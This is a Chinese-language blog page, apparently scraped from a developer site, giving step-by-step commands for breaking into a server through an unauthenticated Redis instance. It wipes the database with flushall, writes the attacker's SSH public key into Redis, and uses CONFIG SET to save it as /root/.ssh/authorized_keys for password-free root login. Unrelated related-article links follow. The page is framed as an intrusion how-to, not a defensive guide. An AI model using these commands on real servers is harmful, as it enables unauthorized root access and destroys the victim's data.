python如何入侵服务器的_通过redis入侵服务器的步骤
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。
一,生成本地ssh公钥
ssh-keygen
二,先连接redis看看
telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10
三, 清一下redis数据库
redis-cli -h 192.168.15.10 flushall
四, 向redis写自己的公钥
cat key.txt |redis-cli -h 192.168.15.10 -x set redis
五, 利用redis写入到文件中
#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit
六, 远程连接
ssh root@192.168.15.10
注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。
这个是最近redis爆出来的。
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
python如何入侵服务器的_通过redis入侵服务器的步骤相关推荐
- redis多服务器共享_基于redis和shedlock实现分布式锁(超简单)
一.背景 线上部署了两台服务器,通过nginx轮询的方式进行负载均衡.但是这样存在一个问题同一个用户的session共享问题.你或许会说,使用ipHash模式就可以解决session共享的问题,是的确 ...
- 云服务ftp服务器搭建_在阿里云服务器搭建FTP服务器,在本地电脑连接并操作
首先你需要有一个阿里云的ECS服务器 并且开通了公网宽带(话说也不贵,开来玩玩还是可以的,第一次买会比较便宜,第二次买1M的宽带两天是九毛多吧~) 开通了宽带之后,ECS服务器就可以上网了 如果嫌弃阿 ...
- teamspeak3服务器搭建_搭建TeamSpeak语音服务器
1.下载 用文件传输工具传输到服务器上(/root目录下) 2.安装 更新系统 yum update 开放端口 systemctl start firewalld firewall-cmd --zon ...
- python刷票脚本在哪_可以挂在服务器的 12306 刷票脚本
只是在刷出票后发送提醒消息,并不能自动购票.在收到消息后还是得拼手速. 脚本用 Python3 实现,可挂到服务器上 24 小时刷. 前言 总体来说火车票应当是越来越好买,因此一直没怎么太操心.哪知道 ...
- 被黑客入侵了怎么办_被黑客入侵后该怎么办
被黑客入侵了怎么办 Evernote became the latest member of the "we've been hacked" club. And the thing ...
- 如何使用python脚本下载git代码_通过pycharm使用git的步骤(图文详解)
前言 使用git+pycharm有一段时间了,算是稍有点心得,这边整理一下,可能有的方法不是最优,欢迎交流,可能还是习惯敲命令去使用git,不过其实pycharm已经帮忙做了很多了,我们可以不用记住那 ...
- SAAS多租户实现方案_springboot 实现多租户_基于数据库服务器隔离_或共享数据库服务器_但隔离数据库---springcloud工作笔记159
技术交流QQ群[JAVA,C++,Python,.NET,BigData,AI]:170933152 1.先来看看什么是saas? SaaS是Software-as-a-service(软件即 ...
- mysql数据库服务器重启_重启mysql数据库服务器
Mysql错误代码大全 1016错误:文件无法打开,使用后台修复或者使用phpmyadmin进行修复. 1044错误:数据库用户权限不足,请联系空间商解决 1045错误:数据库服务器/数据库用户名/数 ...
- windows云服务器价格_免费windows云服务器
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],&q ...
最新文章
- Tungsten Fabric SDN — 操作实践 — Virtual Networks L2/L3 互联
- ai3中文语音补丁_NS 暗黑破坏神3 中文补丁今日上线!刷起来
- 一文让你完全弄懂Stegosaurus
- PrimeTime指南——概述和基本流程
- jmeter性能分析_使用JMeter和Yourkit进行REST / HTTP服务的性能分析
- build 之前执行task_浅谈VS编译自定义编译任务—MSBuild Task(csproject)-阿里云开发者社区...
- VBA 打开文件对话框
- ClassNotFoundException: INameEnvironment
- 使用.NET Core 2开发部署Angular 5项目
- UVALive - 6440(模拟)
- alexa/alexa-avs-sample-app Windows 安装教程
- dcdc转换器计算机显示,DC-DC转换器的问题
- 什么是VIE:Variable Interest Entities
- PEGA(Low-Code App Builder)Describing a data object
- 《考取HCIA证书看我就够了》第五篇:[HCIA-IoT]物联网技术之感知层技术概览
- 安徽省美术作品版权登记技巧,申请了商标还要申请美术作品版权吗?
- 运用Java获取当前时间
- STM32F103-LED模块
- TortoiseSVN日常使用指南(一)
- ps样式如何导入?Photoshop样式导入教程
热门文章
- 检索数据_6_过滤记录结合使用别名
- PHP系统能不能加爬虫,php能做爬虫吗
- java returnAddres_JavaClient 查询ES-(重要)
- [计算机视觉]人脸应用:人脸检测、人脸对比、五官检测、眨眼检测、活体检测、疲劳检测
- C++const类型的引用参数
- python中复制、浅层拷贝、深层拷贝的区别
- matlab创建二叉树(二维数据)
- 131125 - 关于对“一次元”、“二次元”、“三次元”的兴趣变化的奇思妙想
- java实现mysql的主从切换(第二部分)
- Android 通过Service单独进程模仿离线推送 Server Push